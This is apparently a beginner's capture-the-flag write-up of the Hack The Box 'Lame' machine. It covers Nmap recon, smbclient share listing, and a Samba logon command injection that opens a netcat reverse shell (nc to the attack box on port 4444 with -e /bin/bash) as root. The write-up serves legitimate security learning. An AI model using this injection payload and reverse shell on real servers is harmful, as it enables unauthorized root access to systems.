Lame

About HackTheBox Lame Machine

Machine Creator: ch4p

IP: 10.10.10.3

This is a write-up of a machine - Lame from Hack The Box. Hack The Box is a free online platform that allows you to practice advancing your cybersecurity skills.

Lame is an "easy" rated box. There are two flags to retrieve from each Hack The Box machine. The users.txt flag and the root.txt flag.

Initial Recon

The first thing I did after connecting to the VPN was a port scan using Nmap.

This initial scan shows that this is a Linux machine (which we already knew because HTB tells you), the ports that are open, and the services running. We can see that there are a few services running.

We have an FTP server, an SSH server, and an SMB server. The FTP server allows for anonymous login and following that rabbit hole I also found a vulnerability related to this version of FTP but was unable to exploit it at the time. I chose to look at SSH last as this is typically a more secure service however we may encounter some creds along the way that allow us to authenticate to the SSH server later on.

Exploiting SAMBA:

Samba is the open-source implementation of SMB (Typically a windows protocol) for Unix. Samba provides support for file sharing with Linux/Unix servers and Windows.
SMB List services are available. I ran smbclient -L 10.10.10.3 to list the shares on the server.

The /tmp share looked interesting. I connected to it using smbclient -N to indicate no password login:
smbclient -N \\10.10.10.3

I did some looking around. I wasn’t too familiar with smb so I used basic commands.

As I said, I am not very familiar with SMB but upon some googling, I found a helpful blog:

https://medium.com/@nmappn/exploiting-smb-samba-without-metasploit-series-1-b34291bbfd63

We can inject a command at logon to create a nc reverse shell.
logon “/=nc ‘attack box ip’ 4444 -e /bin/bash"

Similarly, we could have done:

logon “/=nohup nc ‘attack box ip’ 4444 -e /bin/bash"

nohup allows us to keep the subprocess running if the login process fails.
But first, we set up a listener: nc -lvp 4444

Once we receive the shell back we can see that we have a shell on the box as root:

Enumeration

Just for aesthetic purposes, we will spawn a pty shell:
python -c import pty; pty.spawn("bash")

Since we have root on this machine and we can obtain the user flag. We need to find it. We can see that there is a user Makis. The user flag was found in /home/makis.

So this was weird order of operations for the HTB’s I have done so far. Not a whole lot of privilege escalation going on here. But I thought it was a pretty cool box and it is really nice for a beginner.